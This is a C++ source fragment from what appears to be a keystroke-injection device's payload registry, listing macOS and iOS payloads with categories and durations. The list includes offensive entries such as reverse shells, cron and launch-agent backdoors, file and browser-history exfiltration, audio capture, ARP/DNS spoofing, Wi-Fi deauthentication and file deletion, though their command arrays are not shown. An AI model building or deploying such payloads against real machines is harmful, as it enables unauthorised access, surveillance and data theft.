    {"icloud-to-dropbox", "iCloud Documents to Dropbox", 30, "execution", "macos", false, kHidCmds_icloud_to_dropbox, static_cast<uint8_t>(sizeof(kHidCmds_icloud_to_dropbox) / sizeof(kHidCmds_icloud_to_dropbox[0]))},
    {"imessage-2-dropbox", "Imessage Attachments to Dropbox", 30, "execution", "macos", false, kHidCmds_imessage_2_dropbox, static_cast<uint8_t>(sizeof(kHidCmds_imessage_2_dropbox) / sizeof(kHidCmds_imessage_2_dropbox[0]))},
    {"infinte-dialog-box", "Infinite Dialog Box", 30, "execution", "macos", false, kHidCmds_infinte_dialog_box, static_cast<uint8_t>(sizeof(kHidCmds_infinte_dialog_box) / sizeof(kHidCmds_infinte_dialog_box[0]))},
    {"load-tester-mega-folder-create", "Folder Fun", 30, "execution", "macos", false, kHidCmds_load_tester_mega_folder_create, static_cast<uint8_t>(sizeof(kHidCmds_load_tester_mega_folder_create) / sizeof(kHidCmds_load_tester_mega_folder_create[0]))},
    {"macos-website-redirect", "Website Redirect", 30, "execution", "macos", false, kHidCmds_macos_website_redirect, static_cast<uint8_t>(sizeof(kHidCmds_macos_website_redirect) / sizeof(kHidCmds_macos_website_redirect[0]))},
    {"neversleep", "Never Sleep", 30, "execution", "macos", false, kHidCmds_neversleep, static_cast<uint8_t>(sizeof(kHidCmds_neversleep) / sizeof(kHidCmds_neversleep[0]))},
    {"remote-shell", "Remote Shell", 30, "execution", "macos", false, kHidCmds_remote_shell, static_cast<uint8_t>(sizeof(kHidCmds_remote_shell) / sizeof(kHidCmds_remote_shell[0]))},
    {"sys-file-delete", "Fuck your Files", 30, "execution", "macos", false, kHidCmds_sys_file_delete, static_cast<uint8_t>(sizeof(kHidCmds_sys_file_delete) / sizeof(kHidCmds_sys_file_delete[0]))},
    {"system-disruption-loop", "System Disruption Loop", 30, "execution", "macos", false, kHidCmds_system_disruption_loop, static_cast<uint8_t>(sizeof(kHidCmds_system_disruption_loop) / sizeof(kHidCmds_system_disruption_loop[0]))},
    {"browser-history", "Browser History Exfiltration", 30, "exfiltration", "macos", false, kHidCmds_browser_history, static_cast<uint8_t>(sizeof(kHidCmds_browser_history) / sizeof(kHidCmds_browser_history[0]))},
    {"desktop-exfil", "Desktop Exfiltration", 30, "exfiltration", "macos", false, kHidCmds_desktop_exfil, static_cast<uint8_t>(sizeof(kHidCmds_desktop_exfil) / sizeof(kHidCmds_desktop_exfil[0]))},
    {"notes-exfil", "Notes Exfiltration", 30, "exfiltration", "macos", false, kHidCmds_notes_exfil, static_cast<uint8_t>(sizeof(kHidCmds_notes_exfil) / sizeof(kHidCmds_notes_exfil[0]))},
    {"screenshare-toggle", "Screen Share Toggle", 30, "exfiltration", "macos", false, kHidCmds_screenshare_toggle, static_cast<uint8_t>(sizeof(kHidCmds_screenshare_toggle) / sizeof(kHidCmds_screenshare_toggle[0]))},
    {"screenshot-capture", "Screenshot Capture", 30, "exfiltration", "macos", false, kHidCmds_screenshot_capture, static_cast<uint8_t>(sizeof(kHidCmds_screenshot_capture) / sizeof(kHidCmds_screenshot_capture[0]))},
    {"app-chaos-montage", "App Chaos Montage", 78, "fun", "macos", false, kHidCmds_app_chaos_montage, static_cast<uint8_t>(sizeof(kHidCmds_app_chaos_montage) / sizeof(kHidCmds_app_chaos_montage[0]))},
    {"ascii-chaos-console", "ASCII Chaos Console", 88, "fun", "macos", false, kHidCmds_ascii_chaos_console, static_cast<uint8_t>(sizeof(kHidCmds_ascii_chaos_console) / sizeof(kHidCmds_ascii_chaos_console[0]))},
    {"autotype-drama-scene", "Autotype Drama Scene", 85, "fun", "macos", false, kHidCmds_autotype_drama_scene, static_cast<uint8_t>(sizeof(kHidCmds_autotype_drama_scene) / sizeof(kHidCmds_autotype_drama_scene[0]))},
    {"beat-sync-terminal", "Beat Sync Terminal", 70, "fun", "macos", false, kHidCmds_beat_sync_terminal, static_cast<uint8_t>(sizeof(kHidCmds_beat_sync_terminal) / sizeof(kHidCmds_beat_sync_terminal[0]))},
    {"cinematic-fake-breach", "Cinematic Fake Breach", 75, "fun", "macos", false, kHidCmds_cinematic_fake_breach, static_cast<uint8_t>(sizeof(kHidCmds_cinematic_fake_breach) / sizeof(kHidCmds_cinematic_fake_breach[0]))},
    {"example-hello-world", "Hello World", 5, "fun", "macos", false, kHidCmds_example_hello_world, static_cast<uint8_t>(sizeof(kHidCmds_example_hello_world) / sizeof(kHidCmds_example_hello_world[0]))},
    {"glitch-desktop-takeover", "Glitch Desktop Takeover", 80, "fun", "macos", false, kHidCmds_glitch_desktop_takeover, static_cast<uint8_t>(sizeof(kHidCmds_glitch_desktop_takeover) / sizeof(kHidCmds_glitch_desktop_takeover[0]))},
    {"matrix-rain-studio", "Matrix Rain Studio", 70, "fun", "macos", false, kHidCmds_matrix_rain_studio, static_cast<uint8_t>(sizeof(kHidCmds_matrix_rain_studio) / sizeof(kHidCmds_matrix_rain_studio[0]))},
    {"notification-storm-lite", "Notification Storm Lite", 65, "fun", "macos", false, kHidCmds_notification_storm_lite, static_cast<uint8_t>(sizeof(kHidCmds_notification_storm_lite) / sizeof(kHidCmds_notification_storm_lite[0]))},
    {"reveal-and-reset", "Reveal and Reset", 60, "fun", "macos", false, kHidCmds_reveal_and_reset, static_cast<uint8_t>(sizeof(kHidCmds_reveal_and_reset) / sizeof(kHidCmds_reveal_and_reset[0]))},
    {"rickroll-macos-safari", "Rickroll Safari (macOS)", 35, "fun", "macos", false, kHidCmds_rickroll_macos_safari, static_cast<uint8_t>(sizeof(kHidCmds_rickroll_macos_safari) / sizeof(kHidCmds_rickroll_macos_safari[0]))},
    {"live-chart-crypto", "Live Chart and price ticker", 30, "goodusb", "macos", false, kHidCmds_live_chart_crypto, static_cast<uint8_t>(sizeof(kHidCmds_live_chart_crypto) / sizeof(kHidCmds_live_chart_crypto[0]))},
    {"app-carousel-demo", "iPhone App Carousel Demo", 30, "ios", "iphone", false, kHidCmds_app_carousel_demo, static_cast<uint8_t>(sizeof(kHidCmds_app_carousel_demo) / sizeof(kHidCmds_app_carousel_demo[0]))},
    {"app-switch-demo", "iPad App Switch Demo", 16, "ios", "ipad", false, kHidCmds_app_switch_demo, static_cast<uint8_t>(sizeof(kHidCmds_app_switch_demo) / sizeof(kHidCmds_app_switch_demo[0]))},
    {"card-stack-demo", "iPhone Card Stack Demo", 28, "ios", "iphone", false, kHidCmds_card_stack_demo, static_cast<uint8_t>(sizeof(kHidCmds_card_stack_demo) / sizeof(kHidCmds_card_stack_demo[0]))},
    {"digit-storm", "Digit Storm", 15, "ios", "ios_simple", true, kHidCmds_digit_storm, static_cast<uint8_t>(sizeof(kHidCmds_digit_storm) / sizeof(kHidCmds_digit_storm[0]))},
    {"focus-tools-demo", "iPhone Focus Tools Demo", 28, "ios", "iphone", false, kHidCmds_focus_tools_demo, static_cast<uint8_t>(sizeof(kHidCmds_focus_tools_demo) / sizeof(kHidCmds_focus_tools_demo[0]))},
    {"home-loop-demo", "iPhone Home Loop Demo", 26, "ios", "iphone", false, kHidCmds_home_loop_demo, static_cast<uint8_t>(sizeof(kHidCmds_home_loop_demo) / sizeof(kHidCmds_home_loop_demo[0]))},
    {"little-hakr-cyber-hero-story", "Little Hakr Cyber Hero Story", 360, "ios", "ios_simple", true, kHidCmds_little_hakr_cyber_hero_story, static_cast<uint8_t>(sizeof(kHidCmds_little_hakr_cyber_hero_story) / sizeof(kHidCmds_little_hakr_cyber_hero_story[0]))},
    {"lorem-ipsum-stream", "iOS Lorem Ipsum Stream", 240, "ios", "ios_simple", true, kHidCmds_lorem_ipsum_stream, static_cast<uint8_t>(sizeof(kHidCmds_lorem_ipsum_stream) / sizeof(kHidCmds_lorem_ipsum_stream[0]))},
    {"notes-template-demo", "iOS Notes Template Demo", 22, "ios", "ios_shared", true, kHidCmds_notes_template_demo, static_cast<uint8_t>(sizeof(kHidCmds_notes_template_demo) / sizeof(kHidCmds_notes_template_demo[0]))},
    {"num4-loop", "Random 4 Digit Loop", 60, "ios", "ios_simple", true, kHidCmds_num4_loop, static_cast<uint8_t>(sizeof(kHidCmds_num4_loop) / sizeof(kHidCmds_num4_loop[0]))},
    {"num4-simple", "iOS Number 4 Simple", 5, "ios", "ios_simple", true, kHidCmds_num4_simple, static_cast<uint8_t>(sizeof(kHidCmds_num4_simple) / sizeof(kHidCmds_num4_simple[0]))},
    {"productivity-tour-demo", "iPhone Productivity Tour Demo", 30, "ios", "iphone", false, kHidCmds_productivity_tour_demo, static_cast<uint8_t>(sizeof(kHidCmds_productivity_tour_demo) / sizeof(kHidCmds_productivity_tour_demo[0]))},
    {"rickroll-safari", "iOS Shared Rickroll Safari", 40, "ios", "ios_shared", false, kHidCmds_rickroll_safari, static_cast<uint8_t>(sizeof(kHidCmds_rickroll_safari) / sizeof(kHidCmds_rickroll_safari[0]))},
    {"shortcut-demo-alt", "iPhone Shortcut Demo", 20, "ios", "iphone", false, kHidCmds_shortcut_demo_alt, static_cast<uint8_t>(sizeof(kHidCmds_shortcut_demo_alt) / sizeof(kHidCmds_shortcut_demo_alt[0]))},
    {"shortcut-demo", "iOS Shared Shortcut Demo", 18, "ios", "ios_shared", false, kHidCmds_shortcut_demo, static_cast<uint8_t>(sizeof(kHidCmds_shortcut_demo) / sizeof(kHidCmds_shortcut_demo[0]))},
    {"system-status", "System Status Template", 20, "ios", "ios_simple", true, kHidCmds_system_status, static_cast<uint8_t>(sizeof(kHidCmds_system_status) / sizeof(kHidCmds_system_status[0]))},
    {"text-demo", "iOS Shared Text Demo", 20, "ios", "ios_shared", true, kHidCmds_text_demo, static_cast<uint8_t>(sizeof(kHidCmds_text_demo) / sizeof(kHidCmds_text_demo[0]))},
    {"arp-spoof", "ARP Spoof Attack", 30, "network-attacks", "macos", false, kHidCmds_arp_spoof, static_cast<uint8_t>(sizeof(kHidCmds_arp_spoof) / sizeof(kHidCmds_arp_spoof[0]))},
    {"dns-spoof", "DNS Spoof Attack", 30, "network-attacks", "macos", false, kHidCmds_dns_spoof, static_cast<uint8_t>(sizeof(kHidCmds_dns_spoof) / sizeof(kHidCmds_dns_spoof[0]))},
    {"evil-twin", "Evil Twin AP", 30, "network-attacks", "macos", false, kHidCmds_evil_twin, static_cast<uint8_t>(sizeof(kHidCmds_evil_twin) / sizeof(kHidCmds_evil_twin[0]))},
    {"port-knocker", "Port Knocker", 30, "network-attacks", "macos", false, kHidCmds_port_knocker, static_cast<uint8_t>(sizeof(kHidCmds_port_knocker) / sizeof(kHidCmds_port_knocker[0]))},
    {"wifi-deauth", "WiFi Deauth Attack", 30, "network-attacks", "macos", false, kHidCmds_wifi_deauth, static_cast<uint8_t>(sizeof(kHidCmds_wifi_deauth) / sizeof(kHidCmds_wifi_deauth[0]))},
    {"darknet-angel", "DarkNet Angel", 30, "obscurity", "macos", false, kHidCmds_darknet_angel, static_cast<uint8_t>(sizeof(kHidCmds_darknet_angel) / sizeof(kHidCmds_darknet_angel[0]))},
    {"darknet-restore", "DarkNet Angel Restore", 30, "obscurity", "macos", false, kHidCmds_darknet_restore, static_cast<uint8_t>(sizeof(kHidCmds_darknet_restore) / sizeof(kHidCmds_darknet_restore[0]))},
    {"file-encryption", "File Encryption", 30, "obscurity", "macos", false, kHidCmds_file_encryption, static_cast<uint8_t>(sizeof(kHidCmds_file_encryption) / sizeof(kHidCmds_file_encryption[0]))},
    {"mac-cloak-reverse", "MacCloak/Reverse", 30, "obscurity", "macos", false, kHidCmds_mac_cloak_reverse, static_cast<uint8_t>(sizeof(kHidCmds_mac_cloak_reverse) / sizeof(kHidCmds_mac_cloak_reverse[0]))},
    {"mac-cloak", "MacCloak: Untraceable", 30, "obscurity", "macos", false, kHidCmds_mac_cloak, static_cast<uint8_t>(sizeof(kHidCmds_mac_cloak) / sizeof(kHidCmds_mac_cloak[0]))},
    {"mac-netghost-restore", "MacNetGhostRestore", 30, "obscurity", "macos", false, kHidCmds_mac_netghost_restore, static_cast<uint8_t>(sizeof(kHidCmds_mac_netghost_restore) / sizeof(kHidCmds_mac_netghost_restore[0]))},
    {"mac-netghost", "MacNetGhost", 30, "obscurity", "macos", false, kHidCmds_mac_netghost, static_cast<uint8_t>(sizeof(kHidCmds_mac_netghost) / sizeof(kHidCmds_mac_netghost[0]))},
    {"netwirk-fragmentation", "Fragmentation Traffic Generator", 30, "obscurity", "macos", false, kHidCmds_netwirk_fragmentation, static_cast<uint8_t>(sizeof(kHidCmds_netwirk_fragmentation) / sizeof(kHidCmds_netwirk_fragmentation[0]))},
    {"network-padding-fury", "Network Padding Fury", 30, "obscurity", "macos", false, kHidCmds_network_padding_fury, static_cast<uint8_t>(sizeof(kHidCmds_network_padding_fury) / sizeof(kHidCmds_network_padding_fury[0]))},
    {"shadowsocks-proxy-ninja", "Shadowsocks Proxy Ninja", 30, "obscurity", "macos", false, kHidCmds_shadowsocks_proxy_ninja, static_cast<uint8_t>(sizeof(kHidCmds_shadowsocks_proxy_ninja) / sizeof(kHidCmds_shadowsocks_proxy_ninja[0]))},
    {"shadowsocks-reverse", "Shadowsocks Tor Proxy Reverse", 30, "obscurity", "macos", false, kHidCmds_shadowsocks_reverse, static_cast<uint8_t>(sizeof(kHidCmds_shadowsocks_reverse) / sizeof(kHidCmds_shadowsocks_reverse[0]))},
    {"silent-server", "Silent Server Creator", 30, "obscurity", "macos", false, kHidCmds_silent_server, static_cast<uint8_t>(sizeof(kHidCmds_silent_server) / sizeof(kHidCmds_silent_server[0]))},
    {"tcp-randomizer", "TCP Randomizer", 30, "obscurity", "macos", false, kHidCmds_tcp_randomizer, static_cast<uint8_t>(sizeof(kHidCmds_tcp_randomizer) / sizeof(kHidCmds_tcp_randomizer[0]))},
    {"bash-profile-inject", "Bash Profile Inject", 30, "persistence", "macos", false, kHidCmds_bash_profile_inject, static_cast<uint8_t>(sizeof(kHidCmds_bash_profile_inject) / sizeof(kHidCmds_bash_profile_inject[0]))},
    {"cron-backdoor", "Cron Backdoor", 30, "persistence", "macos", false, kHidCmds_cron_backdoor, static_cast<uint8_t>(sizeof(kHidCmds_cron_backdoor) / sizeof(kHidCmds_cron_backdoor[0]))},
    {"launch-agent", "Launch Agent Persistence", 30, "persistence", "macos", false, kHidCmds_launch_agent, static_cast<uint8_t>(sizeof(kHidCmds_launch_agent) / sizeof(kHidCmds_launch_agent[0]))},
    {"login-item", "Login Item Persistence", 30, "persistence", "macos", false, kHidCmds_login_item, static_cast<uint8_t>(sizeof(kHidCmds_login_item) / sizeof(kHidCmds_login_item[0]))},
    {"wifi-autoconnect", "WiFi Auto-Connect Rogue AP", 30, "persistence", "macos", false, kHidCmds_wifi_autoconnect, static_cast<uint8_t>(sizeof(kHidCmds_wifi_autoconnect) / sizeof(kHidCmds_wifi_autoconnect[0]))},
    {"arp-table-to-iphone", "Arp table to Iphone", 30, "recon", "macos", false, kHidCmds_arp_table_to_iphone, static_cast<uint8_t>(sizeof(kHidCmds_arp_table_to_iphone) / sizeof(kHidCmds_arp_table_to_iphone[0]))},
    {"copy-all-jpeg", "Copy All JPEG Images", 30, "recon", "macos", false, kHidCmds_copy_all_jpeg, static_cast<uint8_t>(sizeof(kHidCmds_copy_all_jpeg) / sizeof(kHidCmds_copy_all_jpeg[0]))},
    {"infinite-reverse-shell", "Infinite Reverse Shell.txt", 30, "recon", "macos", false, kHidCmds_infinite_reverse_shell, static_cast<uint8_t>(sizeof(kHidCmds_infinite_reverse_shell) / sizeof(kHidCmds_infinite_reverse_shell[0]))},
    {"macos-system-log-to-iphone", "macOS System Log to iPhone", 30, "recon", "macos", false, kHidCmds_macos_system_log_to_iphone, static_cast<uint8_t>(sizeof(kHidCmds_macos_system_log_to_iphone) / sizeof(kHidCmds_macos_system_log_to_iphone[0]))},
    {"networkrecon", "Network Reconnaissance", 30, "recon", "macos", false, kHidCmds_networkrecon, static_cast<uint8_t>(sizeof(kHidCmds_networkrecon) / sizeof(kHidCmds_networkrecon[0]))},
    {"networkreconplus", "Network Recon +", 30, "recon", "macos", false, kHidCmds_networkreconplus, static_cast<uint8_t>(sizeof(kHidCmds_networkreconplus) / sizeof(kHidCmds_networkreconplus[0]))},
    {"nmap-scan-to-iphone", "Nmap Scan to Iphone", 30, "recon", "macos", false, kHidCmds_nmap_scan_to_iphone, static_cast<uint8_t>(sizeof(kHidCmds_nmap_scan_to_iphone) / sizeof(kHidCmds_nmap_scan_to_iphone[0]))},
    {"portscan", "InfoInfiltrator", 30, "recon", "macos", false, kHidCmds_portscan, static_cast<uint8_t>(sizeof(kHidCmds_portscan) / sizeof(kHidCmds_portscan[0]))},
    {"public-ip-finder", "Public I.P. Finder", 30, "recon", "macos", false, kHidCmds_public_ip_finder, static_cast<uint8_t>(sizeof(kHidCmds_public_ip_finder) / sizeof(kHidCmds_public_ip_finder[0]))},
    {"public-ip-to-iphone", "Public I.P. Finder", 30, "recon", "macos", false, kHidCmds_public_ip_to_iphone, static_cast<uint8_t>(sizeof(kHidCmds_public_ip_to_iphone) / sizeof(kHidCmds_public_ip_to_iphone[0]))},
    {"reverse-shell", "Reverse Shell", 30, "recon", "macos", false, kHidCmds_reverse_shell, static_cast<uint8_t>(sizeof(kHidCmds_reverse_shell) / sizeof(kHidCmds_reverse_shell[0]))},
    {"sentinelstrike", "SentinelStrike", 30, "recon", "macos", false, kHidCmds_sentinelstrike, static_cast<uint8_t>(sizeof(kHidCmds_sentinelstrike) / sizeof(kHidCmds_sentinelstrike[0]))},
    {"socat-shell", "SocatShell", 30, "recon", "macos", false, kHidCmds_socat_shell, static_cast<uint8_t>(sizeof(kHidCmds_socat_shell) / sizeof(kHidCmds_socat_shell[0]))},
    {"sysnet-info", "SysNet Info", 30, "recon", "macos", false, kHidCmds_sysnet_info, static_cast<uint8_t>(sizeof(kHidCmds_sysnet_info) / sizeof(kHidCmds_sysnet_info[0]))},
    {"voice-logger", "Phantom Audio Capturer", 30, "recon", "macos", false, kHidCmds_voice_logger, static_cast<uint8_t>(sizeof(kHidCmds_voice_logger) / sizeof(kHidCmds_voice_logger[0]))},
    {"web-scraper", "Web Scraper", 30, "recon", "macos", false, kHidCmds_web_scraper, static_cast<uint8_t>(sizeof(kHidCmds_web_scraper) / sizeof(kHidCmds_web_scraper[0]))},
};

constexpr size_t kHidPayloadCount = sizeof(kHidPayloads) / sizeof(kHidPayloads[0]);
